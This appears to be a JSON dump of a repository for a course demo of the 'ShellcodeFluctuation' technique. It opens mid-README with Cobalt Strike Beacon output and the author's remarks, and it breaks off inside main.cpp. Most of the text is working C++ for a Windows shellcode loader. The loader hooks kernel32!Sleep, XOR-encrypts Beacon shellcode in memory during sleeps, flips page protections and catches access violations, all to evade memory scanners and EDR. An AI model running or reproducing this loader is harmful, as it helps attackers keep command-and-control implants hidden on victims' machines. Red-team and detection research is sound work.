kernel32.dll\n[+] host called home, sent: 9475 bytes\n[+] received output:\nntdll.dll <.text>\nUnhook is done.\n```\n\n[Modified `unhook-bof` with option to ignore specified modules](https://github.com/mgeeky/unhook-bof)\n\n---\n\n## Final remark\n\nThis PoC was designed to work with Cobalt Strike's Beacon shellcodes. The Beacon is known to call out to `kernel32!Sleep` to await further instructions from its C2. \nThis loader leverages that fact by hooking `Sleep` in order to perform its housekeeping. \n\nThis implementation might not work with other shellcodes in the market (such as _Meterpreter_) if they don't use `Sleep` to cool down. \nSince this is merely a _Proof of Concept_ showing the technique, I don't intend on adding support for any other C2 framework.\n\nWhen you understand the concept, surely you'll be able to translate it into your shellcode requirements and adapt the solution for your advantage.\n\nPlease do not open Github issues related to \"this code doesn't work with XYZ shellcode\", they'll be closed immediately.\n\n---\n\n### ☕ Show Support ☕\n\nThis and other projects are outcome of sleepless nights and **plenty of hard work**. If you like what I do and appreciate that I always give back to the community,\n[Consider buying me a coffee](https://github.com/sponsors/mgeeky) _(or better a beer)_ just to say thank you! 💪 \n\n---\n\n## Author\n\n``` \n Mariusz Banach / mgeeky, 21\n \n (https://github.com/mgeeky)\n```\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n Win32\r\n \r\n \r\n Release\r\n Win32\r\n \r\n \r\n Debug\r\n x64\r\n \r\n \r\n Release\r\n x64\r\n \r\n \r\n \r\n 16.0\r\n Win32Proj\r\n {9eed9e19-9475-4d2e-9b06-37d6799417fe}\r\n ShellcodeFluctuation\r\n 10.0\r\n \r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n Application\r\n true\r\n v143\r\n Unicode\r\n \r\n \r\n Application\r\n false\r\n v143\r\n true\r\n Unicode\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n true\r\n \r\n \r\n false\r\n \r\n \r\n true\r\n \r\n \r\n false\r\n \r\n \r\n \r\n Level3\r\n true\r\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n stdcpp17\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n true\r\n true\r\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n stdcpp17\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n false\r\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n stdcpp17\r\n false\r\n false\r\n \r\n \r\n Console\r\n true\r\n \r\n \r\n \r\n \r\n Level3\r\n true\r\n true\r\n true\r\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\r\n true\r\n stdcpp17\r\n \r\n \r\n Console\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj.filters", "content": "\r\n\r\n \r\n \r\n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\r\n cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx\r\n \r\n \r\n {93995380-89BD-4b04-88EB-625FBE52EBFB}\r\n h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd\r\n \r\n \r\n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\r\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\r\n \r\n \r\n \r\n \r\n Source Files\r\n \r\n \r\n Source Files\r\n \r\n \r\n \r\n \r\n Header Files\r\n \r\n \r\n Header Files\r\n \r\n \r\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/ShellcodeFluctuation.vcxproj.user", "content": "\n\n \n d:\\dev2\\ShellcodeFluctuation\\tests\\beacon64.bin 2\n WindowsLocalDebugger\n \n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/base64.cpp", "content": "/*\n base64.cpp and base64.h\n\n base64 encoding and decoding with C++.\n More information at\n\t https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp\n\n Version: 2.rc.08 (release candidate)\n\n Copyright (C) 2004-2017, 2020, 2021 Ren?Nyffenegger\n\n This source code is provided 'as-is', without any express or implied\n warranty. In no event will the author be held liable for any damages\n arising from the use of this software.\n\n Permission is granted to anyone to use this software for any purpose,\n including commercial applications, and to alter it and redistribute it\n freely, subject to the following restrictions:\n\n 1. The origin of this source code must not be misrepresented; you must not\n\t claim that you wrote the original source code. If you use this source code\n\t in a product, an acknowledgment in the product documentation would be\n\t appreciated but is not required.\n\n 2. Altered source versions must be plainly marked as such, and must not be\n\t misrepresented as being the original source code.\n\n 3. This notice may not be removed or altered from any source distribution.\n\n Ren?Nyffenegger rene.nyffenegger@adp-gmbh.ch\n\n*/\n\n#include \"base64.h\"\n\n#include \n#include \n\n//\n// Depending on the url parameter in base64_chars, one of\n// two sets of base64 characters needs to be chosen.\n// They differ in their last two characters.\n//\nstatic const char* base64_chars[2] = {\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"+/\",\n\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"-_\" };\n\nstatic unsigned int pos_of_char(const unsigned char chr) {\n\t//\n\t// Return the position of chr within base64_encode()\n\t//\n\n\tif (chr >= 'A' && chr <= 'Z') return chr - 'A';\n\telse if (chr >= 'a' && chr <= 'z') return chr - 'a' + ('Z' - 'A') + 1;\n\telse if (chr >= '0' && chr <= '9') return chr - '0' + ('Z' - 'A') + ('z' - 'a') + 2;\n\telse if (chr == '+' || chr == '-') return 62; // Be liberal with input and accept both url ('-') and non-url ('+') base 64 characters (\n\telse if (chr == '/' || chr == '_') return 63; // Ditto for '/' and '_'\n\telse\n\t\t//\n\t\t// 2020-10-23: Throw std::exception rather than const char*\n\t\t//(Pablo Martin-Gomez, https://github.com/Bouska)\n\t\t//\n\t\tthrow std::runtime_error(\"Input is not valid base64-encoded data.\");\n}\n\nstatic std::string insert_linebreaks(std::string str, size_t distance) {\n\t//\n\t// Provided by https://github.com/JomaCorpFX, adapted by me.\n\t//\n\tif (!str.length()) {\n\t\treturn \"\";\n\t}\n\n\tsize_t pos = distance;\n\n\twhile (pos < str.size()) {\n\t\tstr.insert(pos, \"\\n\");\n\t\tpos += distance + 1;\n\t}\n\n\treturn str;\n}\n\ntemplate \nstatic std::string encode_with_line_breaks(String s) {\n\treturn insert_linebreaks(base64_encode(s, false), line_length);\n}\n\ntemplate \nstatic std::string encode_pem(String s) {\n\treturn encode_with_line_breaks(s);\n}\n\ntemplate \nstatic std::string encode_mime(String s) {\n\treturn encode_with_line_breaks(s);\n}\n\ntemplate \nstatic std::string encode(String s, bool url) {\n\treturn base64_encode(reinterpret_cast(s.data()), s.length(), url);\n}\n\nstd::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {\n\n\tsize_t len_encoded = (in_len + 2) / 3 * 4;\n\n\tunsigned char trailing_char = url ? '.' : '=';\n\n\t//\n\t// Choose set of base64 characters. They differ\n\t// for the last two positions, depending on the url\n\t// parameter.\n\t// A bool (as is the parameter url) is guaranteed\n\t// to evaluate to either 0 or 1 in C++ therefore,\n\t// the correct character set is chosen by subscripting\n\t// base64_chars with url.\n\t//\n\tconst char* base64_chars_ = base64_chars[url];\n\n\tstd::string ret;\n\tret.reserve(len_encoded);\n\n\tunsigned int pos = 0;\n\n\twhile (pos < in_len) {\n\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);\n\n\t\tif (pos + 1 < in_len) {\n\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);\n\n\t\t\tif (pos + 2 < in_len) {\n\t\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);\n\t\t\t\tret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);\n\t\t\t\tret.push_back(trailing_char);\n\t\t\t}\n\t\t}\n\t\telse {\n\n\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);\n\t\t\tret.push_back(trailing_char);\n\t\t\tret.push_back(trailing_char);\n\t\t}\n\n\t\tpos += 3;\n\t}\n\n\n\treturn ret;\n}\n\ntemplate \nstatic std::string decode(String encoded_string, bool remove_linebreaks) {\n\t//\n\t// decode(? is templated so that it can be used with String = const std::string&\n\t// or std::string_view (requires at least C++17)\n\t//\n\n\tif (encoded_string.empty()) return std::string();\n\n\tif (remove_linebreaks) {\n\n\t\tstd::string copy(encoded_string);\n\n\t\tcopy.erase(std::remove(copy.begin(), copy.end(), '\\n'), copy.end());\n\n\t\treturn base64_decode(copy, false);\n\t}\n\n\tsize_t length_of_string = encoded_string.length();\n\tsize_t pos = 0;\n\n\t//\n\t// The approximate length (bytes) of the decoded string might be one or\n\t// two bytes smaller, depending on the amount of trailing equal signs\n\t// in the encoded string. This approximation is needed to reserve\n\t// enough space in the string to be returned.\n\t//\n\tsize_t approx_length_of_decoded_string = length_of_string / 4 * 3;\n\tstd::string ret;\n\tret.reserve(approx_length_of_decoded_string);\n\n\twhile (pos < length_of_string) {\n\t\t//\n\t\t// Iterate over encoded input string in chunks. The size of all\n\t\t// chunks except the last one is 4 bytes.\n\t\t//\n\t\t// The last chunk might be padded with equal signs or dots\n\t\t// in order to make it 4 bytes in size as well, but this\n\t\t// is not required as per RFC 2045.\n\t\t//\n\t\t// All chunks except the last one produce three output bytes.\n\t\t//\n\t\t// The last chunk produces at least one and up to three bytes.\n\t\t//\n\n\t\tsize_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);\n\n\t\t//\n\t\t// Emit the first output byte that is produced in each chunk:\n\t\t//\n\t\tret.push_back(static_cast(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));\n\n\t\tif ((pos + 2 < length_of_string) && // Check for data that is not padded with equal signs (which is allowed by RFC 2045)\n\t\t\tencoded_string[pos + 2] != '=' &&\n\t\t\tencoded_string[pos + 2] != '.' // accept URL-safe base 64 strings, too, so check for '.' also.\n\t\t\t)\n\t\t{\n\t\t\t//\n\t\t\t// Emit a chunk's second byte (which might not be produced in the last chunk).\n\t\t\t//\n\t\t\tunsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);\n\t\t\tret.push_back(static_cast(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));\n\n\t\t\tif ((pos + 3 < length_of_string) &&\n\t\t\t\tencoded_string[pos + 3] != '=' &&\n\t\t\t\tencoded_string[pos + 3] != '.'\n\t\t\t\t)\n\t\t\t{\n\t\t\t\t//\n\t\t\t\t// Emit a chunk's third byte (which might not be produced in the last chunk).\n\t\t\t\t//\n\t\t\t\tret.push_back(static_cast(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));\n\t\t\t}\n\t\t}\n\n\t\tpos += 4;\n\t}\n\n\treturn ret;\n}\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\nstd::string base64_encode(std::string const& s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string const& s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string const& s) {\n\treturn encode_mime(s);\n}\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\n\nstd::string base64_encode(std::string_view s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string_view s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string_view s) {\n\treturn encode_mime(s);\n}\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\n#endif // __cplusplus >= 201703L\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/base64.h", "content": "#pragma once\r\n//\r\n// base64 encoding and decoding with C++.\r\n// Version: 2.rc.08 (release candidate)\r\n//\r\nconst int XOR_KEY{ 8 };\r\n#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\r\n#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\r\n\r\n#include \r\n\r\n#if __cplusplus >= 201703L\r\n#include \r\n#endif // __cplusplus >= 201703L\r\n\r\nstd::string base64_encode(std::string const& s, bool url = false);\r\nstd::string base64_encode_pem(std::string const& s);\r\nstd::string base64_encode_mime(std::string const& s);\r\n\r\nstd::string base64_decode(std::string const& s, bool remove_linebreaks = false);\r\nstd::string base64_encode(unsigned char const*, size_t len, bool url = false);\r\n\r\n#if __cplusplus >= 201703L\r\n//\r\n// Interface with std::string_view rather than const std::string&\r\n// Requires C++17\r\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\r\n//\r\nstd::string base64_encode(std::string_view s, bool url = false);\r\nstd::string base64_encode_pem(std::string_view s);\r\nstd::string base64_encode_mime(std::string_view s);\r\n\r\nstd::string base64_decode(std::string_view s, bool remove_linebreaks = false);\r\n#endif // __cplusplus >= 201703L\r\n\r\n#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */\r\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/header.h", "content": "#pragma once\n\n#include \n#include \n#include \n#include \n#include \n\ntypedef void (WINAPI* typeSleep)(\n DWORD dwMilis\n );\n\ntypedef DWORD(NTAPI* typeNtFlushInstructionCache)(\n HANDLE ProcessHandle,\n PVOID BaseAddress,\n ULONG NumberOfBytesToFlush\n );\n\ntypedef std::unique_ptr::type, decltype(&::CloseHandle)> HandlePtr;\n\nenum TypeOfFluctuation\n{\n NoFluctuation = 0,\n FluctuateToRW,\n FluctuateToNA, // ORCA666's delight: https://github.com/ORCA666/0x41\n};\n\nstruct FluctuationMetadata\n{\n LPVOID shellcodeAddr;\n SIZE_T shellcodeSize;\n bool currentlyEncrypted;\n DWORD encodeKey;\n DWORD protect;\n};\n\nstruct HookedSleep\n{\n typeSleep origSleep;\n BYTE sleepStub[16];\n};\n\nstruct HookTrampolineBuffers\n{\n // (Input) Buffer containing bytes that should be restored while unhooking.\n BYTE* originalBytes;\n DWORD originalBytesSize;\n\n // (Output) Buffer that will receive bytes present prior to trampoline installation/restoring.\n BYTE* previousBytes;\n DWORD previousBytesSize;\n};\n\n\ntemplate\nvoid log(Args... args)\n{\n std::stringstream oss;\n (oss << ... << args);\n\n std::cout << oss.str() << std::endl;\n}\n\nstatic const DWORD Shellcode_Memory_Protection = PAGE_EXECUTE_READ;\n\nbool hookSleep();\nbool injectShellcode(std::vector& shellcode, HandlePtr& thread);\nbool readShellcode(const char* path, std::vector& shellcode);\nstd::vector collectMemoryMap(HANDLE hProcess, DWORD Type = MEM_PRIVATE | MEM_MAPPED);\nvoid initializeShellcodeFluctuation(const LPVOID caller);\nbool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers = NULL);\nvoid xor32(uint8_t* buf, size_t bufSize, uint32_t xorKey);\nbool isShellcodeThread(LPVOID address);\nvoid shellcodeEncryptDecrypt(LPVOID callerAddress);\nvoid relocateShellcode(const LPVOID caller, LPVOID addressOfRetAddr);\n\nvoid WINAPI MySleep(DWORD _dwMilliseconds);\n" }, { "path": "chapter4-demo4/ShellcodeFluctuation/main.cpp", "content": "\n#include \"header.h\"\n#include \n#include \n#include \"base64.h\"\n\nHookedSleep g_hookedSleep;\nFluctuationMetadata g_fluctuationData;\nTypeOfFluctuation g_fluctuate;\n\n\nvoid WINAPI MySleep(DWORD dwMilliseconds)\n{\n const LPVOID caller = (LPVOID)_ReturnAddress();\n\n //\n // Dynamically determine where the shellcode resides.\n // Of course that we could reuse information collected in `injectShellcode()` \n // right after VirtualAlloc, however the below invocation is a step towards\n // making the implementation self-aware and independent of the loader.\n //\n initializeShellcodeFluctuation(caller);\n\n //\n // Encrypt (XOR32) shellcode's memory allocation and flip its memory pages to RW\n //\n shellcodeEncryptDecrypt(caller);\n\n\n log(\"\\n===> MySleep(\", std::dec, dwMilliseconds, \")\\n\");\n\n HookTrampolineBuffers buffers = { 0 };\n buffers.originalBytes = g_hookedSleep.sleepStub;\n buffers.originalBytesSize = sizeof(g_hookedSleep.sleepStub);\n\n //\n // Unhook kernel32!Sleep to evade hooked Sleep IOC. \n // We leverage the fact that the return address left on the stack will make the thread\n // get back to our handler anyway.\n //\n fastTrampoline(false, (BYTE*)::Sleep, (void*)&MySleep, &buffers);\n\n // Perform sleep emulating originally hooked functionality.\n ::Sleep(dwMilliseconds);\n\n if (g_fluctuate == FluctuateToRW)\n {\n //\n // Decrypt (XOR32) shellcode's memory allocation and flip its memory pages back to RX\n //\n shellcodeEncryptDecrypt((LPVOID)caller);\n }\n else\n {\n //\n // If we fluctuate to PAGE_NOACCESS there is no need to decrypt and revert back memory protections just yet.\n // We await for Access Violation exception to occur, catch it and from within the exception handler will adjust \n // its protection to resume execution.\n //\n }\n\n //\n // Re-hook kernel32!Sleep\n //\n fastTrampoline(true, (BYTE*)::Sleep, (void*)&MySleep);\n}\n\nstd::vector collectMemoryMap(HANDLE hProcess, DWORD Type)\n{\n std::vector out;\n const size_t MaxSize = (sizeof(ULONG_PTR) == 4) ? ((1ULL << 31) - 1) : ((1ULL << 63) - 1);\n\n uint8_t* address = 0;\n while (reinterpret_cast(address) < MaxSize)\n {\n MEMORY_BASIC_INFORMATION mbi = { 0 };\n\n if (!VirtualQueryEx(hProcess, address, &mbi, sizeof(mbi)))\n {\n break;\n }\n\n if ((mbi.Protect == PAGE_EXECUTE_READWRITE || mbi.Protect == PAGE_EXECUTE_READ || mbi.Protect == PAGE_READWRITE)\n && ((mbi.Type & Type) != 0))\n {\n out.push_back(mbi);\n }\n\n address += mbi.RegionSize;\n }\n\n return out;\n}\n\nvoid initializeShellcodeFluctuation(const LPVOID caller)\n{\n if ((g_fluctuate != NoFluctuation) && g_fluctuationData.shellcodeAddr == nullptr && isShellcodeThread(caller))\n {\n auto memoryMap = collectMemoryMap(GetCurrentProcess());\n\n //\n // Iterate over memory pages to find allocation containing the caller, being\n // presumably our Shellcode's thread.\n //\n for (const auto& mbi : memoryMap)\n {\n if (reinterpret_cast(caller) > reinterpret_cast(mbi.BaseAddress)\n && reinterpret_cast(caller) < (reinterpret_cast(mbi.BaseAddress) + mbi.RegionSize))\n {\n //\n // Store memory boundary of our shellcode somewhere globally.\n //\n g_fluctuationData.shellcodeAddr = mbi.BaseAddress;\n g_fluctuationData.shellcodeSize = mbi.RegionSize;\n g_fluctuationData.currentlyEncrypted = false;\n\n std::random_device dev;\n std::mt19937 rng(dev());\n std::uniform_int_distribution dist4GB(0, 0xffffffff);\n\n //\n // Use random 32bit key for XORing.\n //\n g_fluctuationData.encodeKey = dist4GB(rng);\n\n log(\"[+] Fluctuation initialized.\");\n log(\" Shellcode resides at 0x\", \n std::hex, std::setw(8), std::setfill('0'), mbi.BaseAddress, \n \" and occupies \", std::dec, mbi.RegionSize, \n \" bytes. XOR32 key: 0x\", std::hex, std::setw(8), std::setfill('0'), g_fluctuationData.encodeKey, \"\\n\");\n\n return;\n }\n }\n\n log(\"[!] Could not initialize shellcode fluctuation!\");\n ::ExitProcess(0);\n }\n}\n\nvoid xor32(uint8_t* buf, size_t bufSize, uint32_t xorKey)\n{\n uint32_t* buf32 = reinterpret_cast(buf);\n\n auto bufSizeRounded = (bufSize - (bufSize % sizeof(uint32_t))) / 4;\n for (size_t i = 0; i < bufSizeRounded; i++)\n {\n buf32[i] ^= xorKey;\n }\n\n for (size_t i = 4 * bufSizeRounded; i < bufSize; i++)\n {\n buf[i] ^= static_cast(xorKey & 0xff);\n }\n}\n\nbool isShellcodeThread(LPVOID address)\n{\n MEMORY_BASIC_INFORMATION mbi = { 0 };\n if (VirtualQuery(address, &mbi, sizeof(mbi)))\n {\n //\n // To verify whether address belongs to the shellcode's allocation, we can simply\n // query for its type. MEM_PRIVATE is an indicator of dynamic allocations such as VirtualAlloc.\n //\n if (mbi.Type == MEM_PRIVATE)\n {\n const DWORD expectedProtection = (g_fluctuate == FluctuateToRW) ? PAGE_READWRITE : PAGE_NOACCESS;\n\n return ((mbi.Protect & PAGE_EXECUTE_READ) \n || (mbi.Protect & PAGE_EXECUTE_READWRITE)\n || (mbi.Protect & expectedProtection));\n }\n }\n\n return false;\n}\n\nbool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers)\n{\n#ifdef _WIN64\n uint8_t trampoline[] = {\n 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, addr\n 0x41, 0xFF, 0xE2 // jmp r10\n };\n\n uint64_t addr = (uint64_t)(jumpAddress);\n memcpy(&trampoline[2], &addr, sizeof(addr));\n#else\n uint8_t trampoline[] = {\n 0xB8, 0x00, 0x00, 0x00, 0x00, // mov eax, addr\n 0xFF, 0xE0 // jmp eax\n };\n\n uint32_t addr = (uint32_t)(jumpAddress);\n memcpy(&trampoline[1], &addr, sizeof(addr));\n#endif\n\n DWORD dwSize = sizeof(trampoline);\n DWORD oldProt = 0;\n bool output = false;\n\n if (installHook)\n {\n if (buffers != NULL)\n {\n if (buffers->previousBytes == nullptr || buffers->previousBytesSize == 0)\n return false;\n\n memcpy(buffers->previousBytes, addressToHook, buffers->previousBytesSize);\n }\n\n if (::VirtualProtect(\n addressToHook,\n dwSize,\n PAGE_EXECUTE_READWRITE,\n &oldProt\n ))\n {\n memcpy(addressToHook, trampoline, dwSize);\n output = true;\n }\n }\n else\n {\n if (buffers == NULL)\n return false;\n\n if (buffers->originalBytes == nullptr || buffers->originalBytesSize == 0)\n return false;\n\n dwSize = buffers->originalBytesSize;\n\n if (::VirtualProtect(\n addressToHook,\n dwSize,\n PAGE_EXECUTE_READWRITE,\n &oldProt\n ))\n {\n memcpy(addressToHook, buffers->originalBytes, dwSize);\n output = true;\n }\n }\n\n static typeNtFlushInstructionCache pNtFlushInstructionCache = NULL;\n if (!pNtFlushInstructionCache)\n {\n pNtFlushInstructionCache = (typeNtFlushInstructionCache)GetProcAddress(GetModuleHandleA(\"ntdll\"), \"NtFlushInstructionCache\");\n }\n\n pNtFlushInstructionCache(GetCurrentProcess(), addressToHook, dwSize);\n\n\n ::VirtualProtect(\n addressToHook,\n dwSize,\n oldProt,\n &oldProt\n );\n\n return output;\n}\n\nbool hookSleep()\n{\n HookTrampolineBuffers buffers = { 0 };\n buffers.previousBytes = g_hookedSleep.sleepStub;\n buffers.previousBytesSize = sizeof(g_hookedSleep.sleepStub);\n\n g_hookedSleep.origSleep = reinterpret_cast(::Sleep);\n\n if (!fastTrampoline(true, (BYTE*)::Sleep, (void*)&MySleep, &buffers))\n return false;\n\n return true;\n}\n\nvoid shellcodeEncryptDecrypt(LPVOID callerAddress)\n{\n if ((g_fluctuate != NoFluctuation) && g_fluctuationData.shellcodeAddr != nullptr && g_fluctuationData.shellcodeSize > 0)\n {\n if (!isShellcodeThread(callerAddress))\n return;\n\n DWORD oldProt = 0;\n\n if (!g_fluctuationData.currentlyEncrypted \n || (g_fluctuationData.currentlyEncrypted && g_fluctuate == FluctuateToNA))\n {\n ::VirtualProtect(\n g_fluctuationData.shellcodeAddr,\n g_fluctuationData.shellcodeSize,\n PAGE_READWRITE,\n &g_fluctuationData.protect\n );\n\n log(\"[>] Flipped to RW.\");\n }\n \n log((g_fluctuationData.currentlyEncrypted) ? \"[<] Decoding...\" : \"[>] Encoding...\");\n\n xor32(\n reinterpret_cast(g_fluctuationData.shellcodeAddr),\n g_fluctuationData.shellcodeSize,\n g_fluctuationData.encodeKey\n );\n\n if (!g_fluctuationData.currentlyEncrypted && g_fluctuate == FluctuateToNA)\n {\n //\n // Here we're utilising ORCA666's idea to mark the shellcode as PAGE_NOACCESS instead of PAGE_READWRITE\n // and our previously set up vectored exception handler should catch invalid memory access, flip back memory\n // protections and resume the execution.\n // \n // Be sure to check out ORCA666's original implementation here:\n // https://github.com/ORCA666/0x41/blob/main/0x41/HookingLoader.hpp#L285\n //\n\n ::VirtualProtect(\n g_fluctuationData.shellcodeAddr,\n g_fluctuationData.shellcodeSize,\n PAGE_NOACCESS,\n &oldProt\n );\n\n log(\"[>] Flipped to No Access.\\n\");\n }\n else if (g_fluctuationData.currentlyEncrypted)\n {\n ::VirtualProtect(\n g_fluctuationData.shellcodeAddr,\n g_fluctuationData.shellcodeSize,\n g_fluctuationData.protect,\n &oldProt\n );\n\n log(\"[<] Flipped back to RX/RWX.\\n\");\n }\n\n g_fluctuationData.currentlyEncrypted = !g_fluctuationData.currentlyEncrypted;\n }\n}\n\nLONG NTAPI VEHHandler(PEXCEPTION_POINTERS pExceptInfo)\n{\n if (pExceptInfo->ExceptionRecord->ExceptionCode == 0xc0000005)\n {\n#ifdef _WIN64\n ULONG_PTR caller = pExceptInfo->ContextRecord->Rip;\n#else\n ULONG_PTR caller = pExceptInfo->ContextRecord->Eip;\n#endif\n\n log(\"[.] Access Violation occured at 0x\", std::hex, std::setw(8), std::setfill('0'), caller);\n\n //\n // Check if the exception's instruction pointer (EIP/RIP) points back to our shellcode allocation.\n // If it does, it means our shellcode attempted to run but was unable to due to the PAGE_NOACCESS.\n //\n if ((caller >= (ULONG_PTR)g_fluctuationData.shellcodeAddr)\n && (caller <= ((ULONG_PTR)g_fluctuationData.shellcodeAddr + g_fluctuationData.shellcodeSize)))\n {\n log(\"[+] Shellcode wants to Run. Restoring to RX and Decrypting\\n\");\n\n //\n // We'll now decrypt (XOR32) shellcode's memory allocation and flip its memory pages back to RX.\n //\n shellcodeEncryptDecrypt((LPVOID)caller);\n\n //\n // Tell the system everything's OK and we can carry on.\n //\n return EXCEPTION_CONTINUE_EXECUTION;\n }\n }\n\n log(\"[.] Unhandled exception occured. Not the one due to PAGE_NOACCESS :(\");\n\n //\n // Oops, something else just happened and that wasn't due to our PAGE_NOACCESS trick.\n //\n return EXCEPTION_CONTINUE_SEARCH;\n}\n\nbool readShellcode(const char* path, std::vector& shellcode)\n{\n HandlePtr file(CreateFileA(\n path,\n GENERIC_READ,\n FILE_SHARE_READ,\n NULL,\n OPEN_EXISTING,\n 0,\n NULL\n ), &::CloseHandle);\n\n if (INVALID_HANDLE_VALUE == file.get())\n return false;\n\n DWORD highSize;\n DWORD readBytes = 0;\n DWORD lowSize = GetFileSize(file.get(), &highSize);\n\n shellcode.resize(lowSize, 0);\n\n return ReadFile(file.get(), shellcode.data(), lowSize, &readBytes, NULL);\n}\n\nvoid runShellcode(LPVOID param)\n{\n auto func = ((void(*)())param);\n\n //\n // Jumping to shellcode. Look at the coment in injectShellcode() describing why we opted to jump\n // into shellcode in a classical manner instead of fancy hooking \n // ntdll!RtlUserThreadStart+0x21 like in ThreadStackSpoofer example.\n //\n func();\n}\n\nbool injectShellcode(std::vector& shellcode, HandlePtr &thread)\n{\n //\n // Firstly we allocate RW page to avoid RWX-based IOC detections\n //\n auto alloc = ::VirtualAlloc(\n NULL,\n shellcode.size() + 1,\n MEM_COMMIT,\n PAGE_READWRITE\n );\n\n if (!alloc) \n return false;\n\n memcpy(alloc, shellcode.data(), shellcode.size());\n\n DWORD old;\n \n //\n // Then we change that protection to RX\n // \n if (!VirtualProtect(alloc, shellcode.size() + 1, Shellcode_Memory_Protection, &old))\n return false;\n\n /*\n * We're not setting these pointers to let the hooked sleep handler figure them out itself.\n * \n g_fluctuationData.shellcodeAddr = alloc;\n g_fluctuationData.shellcodeSize = shellcode.size();\n g_fluctuationData.protect = Shellcode_Memory_Protection;\n */\n\n shellcode.clear();\n\n //\n // Example provided in https://github.com/mgeeky/ThreadStackSpoofer showed how we can start\n // our shellcode from temporarily hooked ntdll!RtlUserThreadStart+0x21 .\n // \n // That approached was a bit flawed due to the fact, the as soon as we introduce a hook within module,\n // even when we immediately unhook it the system allocates a page of memory (4096 bytes) of type MEM_PRIVATE\n // inside of a shared library allocation that comprises of MEM_IMAGE/MEM_MAPPED pool. \n // \n // Memory scanners such as Moneta are sensitive to scanning memory mapped PE DLLs and finding amount of memory\n // labeled as MEM_PRIVATE within their region, considering this (correctly!) as a \"Modified Code\" anomaly.\n // \n // We're unable to evade this detection for kernel32!Sleep however we can when it comes to ntdll. Instead of\n // running our shellcode from a legitimate user thread callback, we can simply run a thread pointing to our\n // method and we'll instead jump to the shellcode from that method.\n //\n thread.reset(::CreateThread(\n NULL,\n 0,\n (LPTHREAD_START_ROUTINE)runShellcode,\n alloc,\n 0,\n 0\n ));\n\n return (NULL != thread.get());\n}\n\nstd::string replace(const std::string& inStr, const char* pSrc, const char* pReplace)\n\n{\n std::string str = inStr;\n std::string::size_type stStart = 0;\n std::string::iterator iter = str.begin();\n while (iter != str.end())\n\n {\n 